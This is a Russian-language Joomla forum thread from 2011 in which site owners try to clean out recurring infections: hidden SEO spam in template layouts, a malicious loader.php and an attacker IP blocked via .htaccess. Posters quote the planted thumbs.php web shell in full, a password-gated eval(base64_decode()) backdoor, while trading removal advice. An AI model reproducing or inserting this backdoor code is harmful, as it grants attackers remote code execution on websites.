Подозрение на заражение - Безопасность сайтов на Joomla

Случайно в браузере после ног увидел лишний текст, просмотр через гугло бот подтвердили опасения

перерыл весь шаблон (ja_purity_ii) и нашел в папке  layouts в файлах    

• default-joomla.php
• default.php
• handheld.php
• iphone.php
• left-main-right.round.php
• left-main-right.square.php
• left-right-main.round.php
• left-right-main.square.php
• main-right-left.round.php

в самом низу нашлась строчка:
Знающие люди, подскажите откуда берется эта реклама и как почистить кроме того что бы удалить эту строку из всех файлов!
Буквально месяц назад на сайте был iframe-вирус, излечился и пароли все сменил, а сейчас снова такое!

Такая же фигня . Причем код из шаблона удаляешь, меняешь все пароли  иопять он появляется через день. Подскажите как от этого избавиться. FTP пароль сменил, после смены вообще не заходил по FTP а код все равно появился. Помогите пожалуйста.

Скорее всего ломают через какое то уязвимое расширение или залит шелл который вы не убрали.

Скорее всего ломают через какое то уязвимое расширение или залит шелл который вы не убрали.

А как его найти? Помимо этого прописывается в папках tmp cache и images/stories файл thumbs.php
в котором вот такой код:
<?php if(md5($_POST["password"])=="42554769b6d9a25f116f0ca87f66c85a"){eval(base64_decode($_POST["code"]));} ?>   больше пока ничего не нашел. Взлом был 2 марта 2011 года

thumbs.php- удаляй везде где найдешь, потом если старая версия нужно обязательно обновиться до последней (у меня была 1.5.12)
еще посмотри сайт на наличие файлика processor.jpg, особенно в папках от модулей/компонентов и т.д. так же рядом с эти файлом может быть еще с примерным названием link.*.db (точно не помню название), проверяй папки с название tmp вся дрянь как правило там.
И еще построчно посмотри код index.php в твоем шаблоне, у меня где то в середине был include на processor.jpg, так же стоит обратить внимание на footer.php

спасибо, посмотрю.

ну и еще совет, который дают везде - почаще делать бэкапы

У меня такая же беда: http://joomlaforum.ru/index.php?topic=157547.new;topicseen#new

Удалил как написано выше все, но все равно на сайте генерируется скрытый текст.  Где этот вирус сидит так и не разобрался.  Может кто подскажет, на что ещё можно обратить внимание?

В принципе у всех оно приблизительно одинаковое, если у каких-то сильно отличается - смотрите их внимательно. У меня несколько раз врезали код вверху, один раз внизу. И еще один раз модифицировали не .php файлы, а index.html, который в Жумле почти в каждой папке

и как правило вся эта дрянь идет из временных папок компонентов и модулей, стоит внимательно проверить их

удали libraries/joomla/loader.php и заблокируй IP  который найдеш  в loader.php (78.159.101.232).

удали libraries/joomla/loader.php и заблокируй IP  который найдеш  в loader.php (78.159.101.232).

Спасибо, удалил! Наверное глупый вопрос, но как этот IP заблокировать? У хостера просить?

Хостер посоветовал так сделать:

Добавьте в файл .htaccess, который находится в корне Вашего сайта:
deny from 78.159.101.232
Этой записью Вы запретите доступ к Вашему сайту с этого IP-адреса.

Хостер посоветовал правильно 

Народ, на всех своих сайтах обнаружил подобный взлом.
Joomla 1.5.22.
Походу это массовая атака, и используется для простановки seo ссылок - что кстати может загнать ваш сайт в бан Яндекса.

Где-то уязвимость через которую залит шелл.
Блокируя IP и удаляя файлы - уязвимость остается всё равно.

Кому-нибудь удалось её найти?

Тоже имею данную проблему. Как бороться?

Хостер посоветовал правильно 

Я так с дури в свое время роботов Яндексовских запретил

У кого есть такая проблема..
И ЕСТЬ логи доступа за период когда она появилась - ссылку на архив с логами в личку, посмотрю.
При отсутсвии логов за нужный период - не писать.

в логах ничего нет, смотрел HTTP и FTP

Вот и моё время пришло ))))
Всем привет. Нашёл следующее по теме:
http://help.yandex.ru/webmaster/?id=1116584

И кон у себя такой нашёл в файле, которого не должно быть \libraries\joomla\loader.php -  удалил. Всего было два, оставил один.

to argon06: Спаибо, нашёл 4 thumbs.php и удалил с похожим на <?php if(md5($_POST["password"])=="42554769b6d9a25f116f0ca87f66c85a"){eval(base64_decode($_POST["code"]));} ?> кодом.

Ищу дальше. После чистки нужно обновлять. Пока только не совсем понятно, на сайте не нашёл переходного файла с 1.5.12 до последней, попробую 1.5.1_ закинуть.

Далее:
Ктото пытаеться ломать и ломать...
Есть интересный файлик error_log рекомендую глянуть. Там много интересного связанного с файлом \libraries\joomla\loader.php

Спустя несколько часов:
Обновил, почистил и SEF404 выдал следующее, спустя минут 30 после перезаливки
Статус Безопасности: May-2011 [Обновить] (2011-05-09 01:00:58)
Насчитано атак   45    0.2 /h
Слишком много запросов (флуд)   45   100.0 % | 000.2 /h
===
Я так понимаю, что это группа людей с серверами.
В инете всё больше и больше инфы про аналогичные случаи.
Но решения пока нету Есть только меры предосторожности...
Видимо ктото хочет добить Joomla.
Глянем логи.. ничего необычного...

Будем следить и дальше...

переместил configuration.php  в другое место, ссылки невыводится, но код вставлают

to svoloth: configuration.php с каким доступом? 0444?

Ещё я снёс Authentication - OpenID, Authentication - GMail и Authentication - LDAP.
Они не активны по умолчанию, но возможно это тоже дыры...
Гдето в логах обращение к OpenID проскакивало..

configuration.php с каким доступом? 0444?

644

644

Я попробовал поставить 0444 на configuration.php, .htaccess, index.php (тот, что в templates).
Это ко всему вышеописанному.

Ну вот... Прошло почти месяц со дня чистки и некоторых (выше-описанных) манипуляций.
Новых атак пока не наблюдается.
Думаю, что дыры всё-таки тут: Authentication - OpenID, Authentication - GMail и Authentication - LDAP.

Думаю, что дыры всё-таки тут: Authentication - OpenID, Authentication - GMail и Authentication - LDAP.

нету там никаких дыр.

Опять попался..
логи пустые, время одно
Остается 2 варианта - кража фтп-доступа (хотя клиент до этого сидит на маке...) либо дыра у хостера.
Очередной клиент на infobox`е но саппорт не дает фтп-логи напрямую (через клиента итп... короче гемор, но отписал)

Написал быстренько скриптик удалять всю эту пакость
Если скрипт помог - можете донейтить на ЯД 41001251003183 или R545653827015 или Z267652009871

Опять нашел на сайте вирусняк (троян), подсаженыей 28 мая (уж не знаю в какой раз). Задумался о дырах у провайдера ...

Вы бы сайт показали. И список расширений и логи.